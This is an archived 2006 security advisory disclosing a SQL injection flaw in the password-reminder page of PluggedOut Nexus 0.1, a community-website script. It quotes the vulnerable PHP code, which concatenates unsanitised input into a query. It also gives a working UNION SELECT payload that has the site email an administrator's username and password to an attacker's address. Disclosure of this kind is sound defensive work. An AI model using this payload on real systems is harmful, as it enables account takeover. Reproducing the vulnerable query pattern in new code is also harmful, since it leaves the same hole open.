Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11672
HistoryMar 03, 2006 - 12:00 a.m.

PluggedOut Nexus SQL injection

2006-03-0300:00:00
vulners.com
6
JSON

PluggedOut Nexus SQL injection
Nexus is an open source script you can run on your web
server to give you a community based website
where people can register, search each others
interests, and communicate with one another either
through a private messaging system, or via chat
requests and forums.
Project : PluggedOut Nexus
Version : 0.1
Author : Jonathan Beckett
Home : http://www.pluggedout.com

Credit:
The information has been provided by Hamid Ebadi .
( Hamid Network Security Team): admin[AT]hamid[o]ir
The original article can be found at:
http://hamid.ir/security/

Vulnerable Systems:PluggedOut Nexus 0.1

http://localhost/Nexus/forgotten_password.php

in this address If you fill the private email address
that you used while creating your account into the
form , the server will send you an email to that
address with your login details
Input passed to the "email" parameter in
"forgotten_password.php" isn't properly sanitised
before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting
arbitrary SQL code.

test:
in E-Mail Address form enter ' and press Send Request
you will redirect to
http://localhost/Nexus/site_problem.php and see :

Problem with Nexus website
A problem has occurred with the Nexus website - this
was not your fault, and the administrators probably
already know about it.

Vulnerable Code: The following lines in
"forgotten_password.php" :
---------------------------~=[Vulnerable
Code]=~---------------------------
if ($_POST["submit"]!=""){
$con = db_connect();
$sql = "SELECT cUsername,cPassword,cEMailPrivate FROM
nexus_users WHERE
cEMailPrivate='".$_POST["email"]."'";
$result = mysql_query($sql,$con);
if ($result!=false){
if (mysql_num_rows($result)>0){
$row = mysql_fetch_array($result);
$from = $site_admin_email;
$to = $row["cEMailPrivate"];
$subject = "Reminder Username/Password from
".$site_long_name."";
$body = "This email has been sent following a
request for a reminder username/password in the
".$site_long_name." website.\n\n"
."Your account details are as follows;\n"
." Username : ".$row["cUsername"]."\n"
." Password : ".$row["cPassword"]."\n\n"
."If you did not request this reminder message,
please contact the ".$site_long_name." administrator
(".$admin_email.")\n";

                    send_email($from,$to,$subject,$body);

---------------------------~=[/Vulnerable
Code]=~---------------------------

exploit:

insert this code in E-Mail Address form
(http://localhost/Nexus/forgotten_password.php) :
hamidnetworksecurityteam' union select
cUsername,cPassword,'[email protected]' from
nexus_users WHERE nUserId=1 and '1'='1

and [email protected] recieve email contain
username & password for userID=1 .

Signature

Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com

JSON